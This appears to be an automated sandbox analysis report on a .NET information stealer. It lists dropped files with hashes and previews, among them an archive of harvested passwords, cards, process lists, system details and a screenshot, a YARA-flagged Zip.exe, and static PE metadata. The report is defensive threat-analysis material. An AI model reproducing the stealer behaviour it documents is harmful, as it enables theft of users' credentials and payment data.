                                                                                                              SHA-256:2417EC96E49CF7352D91892438478E961D8DC870FEB8E8821C732383CD9351F2
                                                                                                              SHA-512:EA7B613DF726F230ADFEF841E4C8A753228B3AFAE7F2D2FDC2704892910F18254F2D9B31AA5E7D4C993137BCAE92B0FF77D9D31503E96D605DBF0589E42AD809
                                                                                                              Malicious:false
                                                                                                              Reputation:moderate, very likely benign file
                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\f2e0589ed6d670f264a5f65dd0ad000f\Microsoft.VisualBasic.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_6

                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\update_222410.exe.log

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\update_222410.exe
                                                                                                              File Type:CSV text
                                                                                                              Category:modified
                                                                                                              Size (bytes):2140
                                                                                                              Entropy (8bit):5.371730832466707
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:MxHKEYHKGD8Ao6+vxpNl1qHGiD0HKeGitHTG1hAHKKPJAmHKoAPHZHpH+Y:iqEYqGgAo9ZPlwmI0qertzG1eqKPJ/q3
                                                                                                              MD5:8D5284E805C10D2F4ABEEC24A26DDECA
                                                                                                              SHA1:22CC84B3067C6E457FAB34B7792E96AC3FA1E743
                                                                                                              SHA-256:760309005EBFE01DC4FCADAFE45DC919BFCB0C9EF08981671243C403DC8516D1
                                                                                                              SHA-512:CD1C073BC90984DB2A883857DF0649DDD41A6ECEAECC4068145FE30819305CD041E916304E08F33C74682E74CD3806F5B294E80601A35964F25B24B6A38047FE
                                                                                                              Malicious:false
                                                                                                              Reputation:moderate, very likely benign file
                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\f2e0589ed6d670f264a5f65dd0ad000f\Microsoft.VisualBasic.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_6

                                                                                                              C:\Users\user\AppData\Local\Temp\CH_84D70FD1B3.zip

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\Zip.exe
                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                              Category:dropped
                                                                                                              Size (bytes):794314
                                                                                                              Entropy (8bit):7.99790575619382
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:12288:fuYQj7BcRv6cg3Ogp15K5AsJ5SblD+fdutrlYzq8RL6U+5VAmni6Pk0x/Do7S:0hGO3bgasJ5Sb5WYxYW8Rzeni6c0xboG
                                                                                                              MD5:6F1AF199F1516FD5A1F2152037FB0E6E
                                                                                                              SHA1:FDFE22891214ACCB0EFD935D2241DA9D9F283C45
                                                                                                              SHA-256:3427BA90A6A417BFC15A91ABBD17F04072BBDC7B14A38F7B6FB4F326D9B2262F
                                                                                                              SHA-512:DF9EEEF673A42515E98C7B8551D5685138B561FA470A3C65A1C52347519D5708C68FC75A74305A22CC2AFA85EFEB2C126131144ADB1C3BF7E485C15826BCAA15
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview:PK.........PxU................Cards.txtPK.........QxU................Files\PK.........PxUMh......L.......info.txt..1O.0..wK..7&.i....hSQ.R..b@.V..X8v.l.._..........U.a...|:-.x.U......."....w..Wm.7x\..I..A...../\.lC,.f..1.n.%)biO.;...d.]..1%.UZ.._0..9nQd.96._RT.9...U..3.|......ghM'2.......j....ohC..b29.x.U......PK.........PxU................Passwords.txtPK.........PxU.f..*...T.......ProgramList.txt.Aj.0.E...a.-!f$.2...]d.....Ul...ec...,.S.P9.......K3.!F.(KM.tT.x...9$.V.-...dk.a9..G6...."....um...).(.,.q.|<.....M.y.`e..Z...S...~l......r..o.2,.@0.........S.@D..9X.yY.e.m:..Txh..."..s....7.Y..o~......n...Q..!QNf...6j.Fxf0..r......f..........<....=.."k..u..j'w.(...b.f..V>..i... ../PK.........PxUz..5'...........ProsessList.txt.U.n.0..#.....z.E.J.ZBA.]{I...h.y.}.zI....V>.....:....H.v:.N./K21w............+.!.............Ma.....Z;.)..I......Sk..",..f.;.Z.BU2.@IJvF._...V ..n@T..<K..>..*...B:.Ti.ci.\.$.c.M...I.$..R........n..(J.Q.?.g.Hm. `.=..,.....Dx8..o.....

                                                                                                              C:\Users\user\AppData\Local\Temp\CH_84D70FD1B3\ProgramList.txt

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\nwY3YpWQVx.exe
                                                                                                              File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1364
                                                                                                              Entropy (8bit):5.065215317933012
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:c4cxPUwdVScxPUXUcxSTcHocxMocxtOtocxPUWEcxPUaptcxPUv9p1cxPUPbYcx9:x0PPdVS0PGU0WcHo0Mo0Uto0PHE0PFpJ
                                                                                                              MD5:187D97F5AAFF4553BDCE050BEFD951A2
                                                                                                              SHA1:596BE74C875F8C9CA08209F696060F03AFDA2E36
                                                                                                              SHA-256:43F6D6C018A8DC4837153C78124BFDAEF772FF00D67028A46DFCAFEABCEC18EF
                                                                                                              SHA-512:FC608F5E80755ED97DEB818B9B37BBCC7C70EC46E7D6C62B97F4C408DD345190413026FB1C57B3600602421E4174E5E102D73C930F377109CE2B50D8788288D2
                                                                                                              Malicious:false
                                                                                                              Reputation:moderate, very likely benign file
                                                                                                              Preview:Application Name : Microsoft Visual C++ 2019 X64 Additional Runtime - 14.21.27702....Version : 14.21.27702....Installed Date . 20190627....Application Name : Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030....Version : 11.0.61030....Installed Date . 20190627....Application Name : Microsoft Office 64-bit Components 2016....Version : 16.0.4266.1001....Installed Date . 20200723....Application Name : Microsoft Office Shared 64-bit MUI (English) 2016....Version : 16.0.4266.1001....Installed Date . 20200723....Application Name : Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2016....Version : 16.0.4266.1001....Installed Date . 20200723....Application Name : Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005....Version : 12.0.21005....Installed Date . 20190627....Application Name : Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005....Version : 12.0.21005....Installed Date . 20190627....Application Name : Microsoft Visual C++ 2012 x6

                                                                                                              C:\Users\user\AppData\Local\Temp\CH_84D70FD1B3\ProsessList.txt

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\nwY3YpWQVx.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2039
                                                                                                              Entropy (8bit):4.401972084162776
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:jXRoh/qqqh/qqE6EtKtMqqh/qcqq1HrylHgMqh/qqgpyqqqMJqqqqEh8MU/qA8Y8:+ycXFLa806iyd/3c9KgENulX
                                                                                                              MD5:F30DD78EA37C24D319D37C24B4806547
                                                                                                              SHA1:90FA81BF69BA3B7B30C2D2B3EF870BF729B1D7D7
                                                                                                              SHA-256:EA1E16975BA2D18AC4BA922654B6C941950C45FEA6015C76E78C218DB920291E
                                                                                                              SHA-512:94CD705716C5FCA60DCAFB62884AE1FBA61DA9A3A34364774EC6BAC9035594E5F8A6DD1CA6F6676EC0D63A29544F3FFA67524849543FD91714170F95A3AF33F8
                                                                                                              Malicious:false
                                                                                                              Preview:Name : dwm....Name : csrss....Name : DgJxVNrTmByoH....Name : svchost....Name : svchost....Name : svchost....Name : svchost....Name : DgJxVNrTmByoH....Name : svchost....Name : svchost....Name : svchost....Name : fontdrvhost....Name : dllhost....Name : DgJxVNrTmByoH....Name : explorer....Name : svchost....Name : svchost....Name : svchost....Name : DgJxVNrTmByoH....Name : svchost....Name : svchost....Name : winlogon....Name : svchost....Name : svchost....Name : svchost....Name : backgroundTaskHost....Name : DgJxVNrTmByoH....Name : dllhost....Name : svchost....Name : WmiPrvSE....Name : SgrmBroker....Name : svchost....Name : svchost....Name : DgJxVNrTmByoH....Name : svchost....Name : svchost....Name : svchost....Name : spoolsv....Name : svchost....Name : svchost....Name : svchost....Name : svchost....Name : smartscreen....Name : svchost....Name : svchost....Name : svchost....Name : svchost....Name : svchost....Name : fontdrvhost....Name : RuntimeBroker....Name : svchost....Name : services..

                                                                                                              C:\Users\user\AppData\Local\Temp\CH_84D70FD1B3\Screenshot.png

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\nwY3YpWQVx.exe
                                                                                                              File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):801693
                                                                                                              Entropy (8bit):7.942220878003351
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:FchCNYef+K53hGHoJvERCi11YbbXAZUdkZfxhSf3E7jMxPHyPzRpT5G:FchCNHH5c0vQCi1CDKtxG3E7oaPzRG
                                                                                                              MD5:0DF6137A048583B83B6AFE5F74DF95C4
                                                                                                              SHA1:D6406349760E23AEB215E59FEA5F2BB90704891C
                                                                                                              SHA-256:2988EDD06E3948C9A709C7CE12D92A816585EE3985D7B9D5E6736076BC6604CF
                                                                                                              SHA-512:3254192DDB512CFDEC6730CAC27F59FA57C4885801FE8B93539A6328E8C4502AD4AB4167E3E8261B7721F2FC326A8E971B98CCF66328DFBC829165D76B8DBEB2
                                                                                                              Malicious:false
                                                                                                              Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....tGY.{..9.D..2O$$. ..~ . x...G...*..(..(.f.....$S..q`.3!$!.!....I._O......Z..w.....~W....].c.o.v....v.u.c...6......e..........{.N.}Z..S.~-..n?..%f.;.t...q..}.8......:v...3..."...){...s.&..u,n..&...q..F0~..#..c.......^hg.kc!.7)h'.m...b.o.a..-H[G .U)m.I...{`.........;nt.%".I....8...o......=..Q.\..g.w....M..0z...N...Y....aQ.Y...^...Y0..VC}.Ot.O..^.g...{.......F`.;.:.../.8..nc...q@...?.U@lV...........H.w%..G=..}...&.!..y.y.....fk%..]o}4..t....`{......z.c...?..h...{x....1Y*{..(.....1...@..~.}X....M_...c.O.9..j.<.Q..n..2.+a..m..=............u...4..dN.2r.S..h-....g..........6?3.c.@.p...)N.)&..(....<m.IY.m..U.[..'...y...Er .$.x....`.k.p)P.....1....O.Z..a-..0.o...8...B..".:Dt.)........"..m......[lL....3X_.,..}..>}._.P....t....Y\.#.l...a}/....w1.4...l..P/4..'..>..F}.n......T.pG.Y`@..I0.l...g.....'.... .:....Y.P1.-8.........Lk....8..@Z...

                                                                                                              C:\Users\user\AppData\Local\Temp\CH_84D70FD1B3\info.txt

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\nwY3YpWQVx.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):332
                                                                                                              Entropy (8bit):4.579461777700594
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:9lz4GgCF2Rpj1hx0+A7JRXWQuGsLf15Ro1WcEuo8T:fzbHIpxXKRXWQzsLN5RJcfV
                                                                                                              MD5:D338D82D19E20999074FEFCDA1A7FB6D
                                                                                                              SHA1:8DB0F38EE591A3C13C38D6C939D1EDD2BDCFFC56
                                                                                                              SHA-256:E81890683B8875A6F24FE28847E67EAFC6F066D80B1C9F919F89196D5C650362
                                                                                                              SHA-512:C6B06E9921BD660434EA5B8B66243D6C55DB015622E262EE3B948F9C89D040362C0C5AA283AD91CA1CA809A39C1C04486DC2C4EFE0BCAF0166AA97F5E09E1741
                                                                                                              Malicious:false
                                                                                                              Preview:PC Name : 899552..Operating System : Microsoft Windows 10 Pro..Anti virus : Windows Defender..Firewall : None..Processor : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..Memory (RAM) : 8.00 GB..-----------------------------------------------------------------------..-------------Developed By th3darkly [ https://gomorrah.pw ]-------------

                                                                                                              C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dll

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\nwY3YpWQVx.exe
                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:modified
                                                                                                              Size (bytes):407776
                                                                                                              Entropy (8bit):6.080910017085125
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:/+BWmtpZQYS2PjCLfjSCpkALDUbr0tJ0nzbWk:WPw2PjCLe3a6Q70zbR
                                                                                                              MD5:F75FE8D06448D07720D5456F2A327F08
                                                                                                              SHA1:DBA5D60848A7C24CE837225709D9E23690BB5CB3
                                                                                                              SHA-256:977998AEC486395EABA6CE5661648425A1A181CE18C2C87C6288AF62B87D5ECA
                                                                                                              SHA-512:EB05696F92881A698B7DEF0F8852286212A5EB235A2FF8A41460DEDBC6AE1964BFBEF613D3BEC736DF66525BF6E5A6C95FF5E0A71C904FA70B5C6675E2275A34
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: 5SUx8Md4kq.exe, Detection: malicious, Browse
                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                              • Filename: NicDx0BvqP.exe, Detection: malicious, Browse
                                                                                                              • Filename: ngyoL1siem.exe, Detection: malicious, Browse
                                                                                                              • Filename: SecuriteInfo.com.Exploit.ShellCode.69.5295.22971.rtf, Detection: malicious, Browse
                                                                                                              • Filename: AvtoKomander_Installer.msi, Detection: malicious, Browse
                                                                                                              • Filename: VFMPwzPWjM.exe, Detection: malicious, Browse
                                                                                                              • Filename: CpLGtq4jBl.exe, Detection: malicious, Browse
                                                                                                              • Filename: CpLGtq4jBl.exe, Detection: malicious, Browse
                                                                                                              • Filename: 5Qg0FFYoQd.exe, Detection: malicious, Browse
                                                                                                              • Filename: IBK_Minervasoft.exe, Detection: malicious, Browse
                                                                                                              • Filename: PO BNB Trends.exe, Detection: malicious, Browse
                                                                                                              • Filename: Bm6U0Vj6pa.exe, Detection: malicious, Browse
                                                                                                              • Filename: NEW REQUIREMENT..xlsx, Detection: malicious, Browse
                                                                                                              • Filename: kKEMJQNDL.exe, Detection: malicious, Browse
                                                                                                              • Filename: doc2022020909100101019.exe, Detection: malicious, Browse
                                                                                                              • Filename: hesaphareketi-01.pdf.exe, Detection: malicious, Browse
                                                                                                              • Filename: JpClfGxVOT.exe, Detection: malicious, Browse
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:Q.P...........!..................... ... ....... .......................`............@.................................\...O.... ..0................>...@......$................................................ ............... ..H............text........ ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B........................H.......`e..............c..X...P .......................................R..p..4j../ux..;....B.6z.R...K.KT....i.r.p>.m~.p.?YQ.~16~v....J.h.}..k.......&...E....p..Ix..t;.uT7Ph..(.Rv:...y..qp...dX3...bu..{....*"..}....*V.(i.....(......}....*2.{....oj...*2.{....ok...*B..(....&..(....*...0...........oj........YE....{...............{...f...............f.......A...A...A...A...1...A...V...8<....t......{.....om...ol....or.....+U..om.....{.....o....oj...on.....o....o{...t.....o....o}.

                                                                                                              C:\Users\user\AppData\Local\Temp\Zip.exe

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\nwY3YpWQVx.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):32256
                                                                                                              Entropy (8bit):5.050531187823917
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:KfkVQ748aUKN6C8/3g2L4QDL0Lk24jXPlfLoem/xYUIoPBsNJc:RW7PTKF8fPdDL42XPUIc
                                                                                                              MD5:AF07E88EC22CC90CEBFDA29517F101B9
                                                                                                              SHA1:A9E6F4AE24ABF76966D7DB03AF9C802E83760143
                                                                                                              SHA-256:1632FBFF8EDC50F2C7EF7BB2FE9B2C17E6472094F0D365A98E0DEC2A12FA8EC2
                                                                                                              SHA-512:B4575AF98071FC8D46C022E24BFB2C1567D7E5F3DE0D8FB5FEE6F876985C7780A5B145F645725FF27A15367162AA08490AC2F8DD59D705663094FE4E1EEEC7BC
                                                                                                              Malicious:true
                                                                                                              Yara Hits:
                                                                                                              • Rule: Windows_Trojan_Lucifer_ce9d4cc8, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Zip.exe, Author: unknown
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 77%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................D...6.......c... ........@.. ....................................`..................................b..K........1........................................................................... ............... ..H............text....C... ...D.................. ..`.sdata..8............H..............@....rsrc....1.......2...J..............@..@.reloc...............|..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\Desktop\Newtonsoft.Json.dll

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\nwY3YpWQVx.exe
                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):407776
                                                                                                              Entropy (8bit):6.080910017085125
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:/+BWmtpZQYS2PjCLfjSCpkALDUbr0tJ0nzbWk:WPw2PjCLe3a6Q70zbR
                                                                                                              MD5:F75FE8D06448D07720D5456F2A327F08
                                                                                                              SHA1:DBA5D60848A7C24CE837225709D9E23690BB5CB3
                                                                                                              SHA-256:977998AEC486395EABA6CE5661648425A1A181CE18C2C87C6288AF62B87D5ECA
                                                                                                              SHA-512:EB05696F92881A698B7DEF0F8852286212A5EB235A2FF8A41460DEDBC6AE1964BFBEF613D3BEC736DF66525BF6E5A6C95FF5E0A71C904FA70B5C6675E2275A34
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:Q.P...........!..................... ... ....... .......................`............@.................................\...O.... ..0................>...@......$................................................ ............... ..H............text........ ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B........................H.......`e..............c..X...P .......................................R..p..4j../ux..;....B.6z.R...K.KT....i.r.p>.m~.p.?YQ.~16~v....J.h.}..k.......&...E....p..Ix..t;.uT7Ph..(.Rv:...y..qp...dX3...bu..{....*"..}....*V.(i.....(......}....*2.{....oj...*2.{....ok...*B..(....&..(....*...0...........oj........YE....{...............{...f...............f.......A...A...A...A...1...A...V...8<....t......{.....om...ol....or.....+U..om.....{.....o....oj...on.....o....o{...t.....o....o}.

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Entropy (8bit):5.979535587715002
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.69%
                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.64%
                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                              • InstallShield setup (43055/19) 0.21%
                                                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                                                              File name:nwY3YpWQVx.exe
                                                                                                              File size:547374
                                                                                                              MD5:0d43b051c7c73233c85697219bc9a4f4
                                                                                                              SHA1:0568c7d1b2f340b743f8799166e3c45b7ebf87ef
                                                                                                              SHA256:30c03c8a3bb6dc168a799d3399b06863c579e6c22e66a649a8162fa7ca7e370c
                                                                                                              SHA512:75bf59168569419c61b1c53d5672ea65534f5589a354d17543c55bca0c9fb602827625e59d18135c61653a34f62fd2d40d96877ab2ff5ffcaa4fb2d7b787bf36
                                                                                                              SSDEEP:6144:z+BWmtpZQYS2PjCLfjSCpkALDUbr0tJ0nzbWdG/Wow7+JO:SPw2PjCLe3a6Q70zbYow6s
                                                                                                              TLSH:74C45A0223FC4BA5E5FE2B31A631464543F6FD46657AE70D0D80E6EA4C777829E203A7
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....u.a.....................8.......=... ...@....@.. ....................................@................................

                                                                                                              File Icon

                                                                                                              Icon Hash:41455554545445a2

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x483dee
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x618475C5 [Fri Nov 5 00:07:33 2021 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              jmp dword ptr [00402000h]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al

                                                                                                              Data Directories

                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x83d980x53.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x860000x3223.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x8a0000xc.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x840000x1c.sdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                              Sections

                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x20000x81df40x81e00False0.39599186417228105data6.007710958121938IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                              .sdata0x840000x1380x200False0.2421875data2.1996594710852864IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .rsrc0x860000x32230x3400False0.1035907451923077data3.5288775377080097IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0x8a0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                              Resources

                                                                                                              NameRVASizeTypeLanguageCountry
                                                                                                              RT_ICON0x862500x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512
                                                                                                              RT_ICON0x865380x128Device independent bitmap graphic, 16 x 32 x 4, image size 128
                                                                                                              RT_ICON0x866600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors
